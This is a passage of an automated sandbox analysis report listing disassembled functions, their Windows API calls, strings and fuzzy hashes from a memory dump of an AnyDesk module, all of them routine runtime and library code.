                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,69C487AF,69C487AF,?,?,?,69C54F56,00000001,00000001,FCE85006), ref: 69C54D5F
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,69C54F56,00000001,00000001,FCE85006,?,?,?), ref: 69C54DE5
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,FCE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 69C54EDF
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54EEC
                                                                                                                                                                                                                                                    • Part of subcall function 69C4C844: HeapAlloc.KERNEL32(00000000,0000010C,00000004,?,69C4C8A7,?,00000000,?,69C57B70,0000010C,00000004,?,0000010C,?,?,69C4DB9D), ref: 69C4C876
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54EF5
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 69C54F1A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3147120248-0
                                                                                                                                                                                                                                                  • Opcode ID: 08b3318afe663e37608f5d0f93c3b32ce5af2324993c2c16333d374e5497bd85
                                                                                                                                                                                                                                                  • Instruction ID: 2438162d4ae11ebb29c57a5215392eea73c896e82142d8fb82f4188ac138e182
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b3318afe663e37608f5d0f93c3b32ce5af2324993c2c16333d374e5497bd85
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51D072700216AFEB15CF68EC40EABBBA9FB44B94F118629E916D7140FB74DC70C654
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3C070 Relevance: 9.2, APIs: 6, Instructions: 178COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C3C2B0: Sleep.KERNEL32(00000000,?,?,?,69C3C09F,?,00000000,?), ref: 69C3C2F2
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,00000000,?), ref: 69C3C0C4
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,00000000,000000FF,?,?), ref: 69C3C105
                                                                                                                                                                                                                                                    • Part of subcall function 69C2F000: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 69C2F02B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentDirectoryReleaseSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1427338700-0
                                                                                                                                                                                                                                                  • Opcode ID: 8812605fd61d380b0429046cbc95bfef119cadb51f99bc702d6bfd073caa177a
                                                                                                                                                                                                                                                  • Instruction ID: 48b6265802403f8008e1304614329f8640cad50957aacdb444e4f018d47f4375
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8812605fd61d380b0429046cbc95bfef119cadb51f99bc702d6bfd073caa177a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251C9356482619BDF24DF65E841FFEB3A8BF85324F80461DE86E97180FB316405CBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C34E80 Relevance: 9.1, APIs: 6, Instructions: 129COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34EDB
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F0A
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34F5A
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C34F91
                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,00000000,00000000,00000000), ref: 69C34FCD
                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000), ref: 69C3500A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 17069307-0
                                                                                                                                                                                                                                                  • Opcode ID: 6782144d24456dc1596331de066411c1fca5c85defc375e8546d8aebfa77786f
                                                                                                                                                                                                                                                  • Instruction ID: dc45d52f45e7b4aa3a93d6ddd949a9d58b39142831fd86a2b39053b47130a1d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6782144d24456dc1596331de066411c1fca5c85defc375e8546d8aebfa77786f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241E336E026309BCB04DF68E5407ADBBB8BF8A354F954158D819E7380FF319E018B92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4FBB0 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                  • Opcode ID: c6a85edba0e490b7328fb3e08c39b0b9d0b621e59c042ef8d8a8245e67565d53
                                                                                                                                                                                                                                                  • Instruction ID: 072d32bf25709897d56f51e8c7020afca49a7665610db1b3cba11013ff009d8e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6a85edba0e490b7328fb3e08c39b0b9d0b621e59c042ef8d8a8245e67565d53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C83A7946516FE61256297E09F5E2639EFD3F76F219014FC14E61C0FF218807A122
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C2F520 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: vector<T> too long
                                                                                                                                                                                                                                                  • API String ID: 0-3788999226
                                                                                                                                                                                                                                                  • Opcode ID: e7ccd7ff7f553f97eba2bbe306dcf2f2ae098c85e84cebe0286907a4e02df015
                                                                                                                                                                                                                                                  • Instruction ID: 7e9de5d3b3cfaaa1688ed80ea5eb331feb25d830c893c7e4d2dea64c2e3c7931
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ccd7ff7f553f97eba2bbe306dcf2f2ae098c85e84cebe0286907a4e02df015
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 545137366043055FE711CE68AD90F5BB7EAEF88B24F100639F96897290FB71D9048792
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C220B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseDeleteFileHandle
                                                                                                                                                                                                                                                  • String ID: vmodule
                                                                                                                                                                                                                                                  • API String ID: 2633145722-2939338212
                                                                                                                                                                                                                                                  • Opcode ID: 3f1d7535164b04e2ef3089d1c8060a07107c80bf4179094d1a4514836f63d347
                                                                                                                                                                                                                                                  • Instruction ID: 3fc505c6eaa3cc565b15c5b216d492966092c947e2759110465ac79564feb90d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f1d7535164b04e2ef3089d1c8060a07107c80bf4179094d1a4514836f63d347
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9151EDB46183409FDB08CF24E494B5BBBF5FB86318F00891DE9558B291EB76D846CB92
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C64485 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(69C6FB90,00000000,00000000,00000004), ref: 69C644B0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C644CE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C644DB, 69C64561
                                                                                                                                                                                                                                                  • GetFileAttributes , xrefs: 69C64507, 69C64592
                                                                                                                                                                                                                                                  • : not a directory, xrefs: 69C64571
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                  • String ID: : not a directory$GetFileAttributes $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1799206407-2199784763
                                                                                                                                                                                                                                                  • Opcode ID: 6c8029aba4113d9cb1c7f765243b1eda2d496bc5529a556dff00ac526bc12a33
                                                                                                                                                                                                                                                  • Instruction ID: b7f88992cb00b084392e3fd370e47b60c53ef619d8fa9f6a516ec55b963380fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c8029aba4113d9cb1c7f765243b1eda2d496bc5529a556dff00ac526bc12a33
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A23166369503086AEB04DBB4FCA6FBE73ACEF01338F10521AF5156B0D1FF2169858664
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C45300 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C4532B
                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 69C453A5
                                                                                                                                                                                                                                                    • Part of subcall function 69C5E550: __FindPESection.LIBCMT ref: 69C5E5A9
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C45419
                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 69C45444
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 1685366865-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: d8ea3226ebb7be6f08f00e2cbf387c2e3fa3d42bb4a85f173eaab9ddb0a0324b
                                                                                                                                                                                                                                                  • Instruction ID: d65108412929b0159a8029c6546a1f42ba7e90665fc213bc1a036ed3332e934b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8ea3226ebb7be6f08f00e2cbf387c2e3fa3d42bb4a85f173eaab9ddb0a0324b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F41C334B00258ABCF00CF59E880A9EBBB5BF45728F50D196E815DB291E771DA02CFE1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C6421A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(69C6FB90,00000000,?,00000000,00000004), ref: 69C64247
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000004), ref: 69C64258
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000004), ref: 69C64278
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc, xrefs: 69C64285
                                                                                                                                                                                                                                                  • CreateDirectory , xrefs: 69C642B1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectory
                                                                                                                                                                                                                                                  • String ID: CreateDirectory $c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\client\crash_report_database_win.cc
                                                                                                                                                                                                                                                  • API String ID: 1306683694-1373056967
                                                                                                                                                                                                                                                  • Opcode ID: 4ae309d829cf4c6ae26a00ba0fc1e19fd63aa16dc642d95a2784cb1b35702fdc
                                                                                                                                                                                                                                                  • Instruction ID: e8d450a2c953a65a3d93ce749aff9a5c525bc501a92872d037b34bdf4f73090a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ae309d829cf4c6ae26a00ba0fc1e19fd63aa16dc642d95a2784cb1b35702fdc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23210435640308AADB04DFA4FCA6FBE73ACEF41324F60911AF415AB0D2FB31A9458675
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C49EEF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,69C49EA0,69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002), ref: 69C49F0F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 69C49F22
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,69C49EA0,69C21DE7,?,69C49E40,69C21DE7,69C7B670,0000000C,69C49F88,69C21DE7,00000002,00000000), ref: 69C49F45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: 3f0ecd5c74eae5618913f3795e01e50de16c0dacd72ca5a6118244eccce71246
                                                                                                                                                                                                                                                  • Instruction ID: 3d87d0d87905b3ca0ce55d8528c72e67d7a45dcef600f8baf50c6c3c85a693db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f0ecd5c74eae5618913f3795e01e50de16c0dacd72ca5a6118244eccce71246
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0C230A14628FFDF019F95DC08BADBFB8EF45B22F4040A5F809A2150EB349941CB96
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C545ED Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ca84f8b36e0b9b58da44a63e6e6f938320fae813a15ab7562883627a08a1bb0c
                                                                                                                                                                                                                                                  • Instruction ID: b3c7c5ee31a76b25e01cd0d190bcfebe335361daa9461c80494d8e57234818af
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca84f8b36e0b9b58da44a63e6e6f938320fae813a15ab7562883627a08a1bb0c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6571F635D00296DBDB11CF55D884ABFBBB6FF423A4F144229E422A7190FB708971CBA5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C4B731 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __cftoe.LIBCMT ref: 69C4B757
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B77D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B84F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C4B882
                                                                                                                                                                                                                                                    • Part of subcall function 69C4B8F3: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,69C4FCCF,00000001,00000364,?,?,69C46175,00000000,00000000,00000000,00000000,00000000,0000010C), ref: 69C4B934
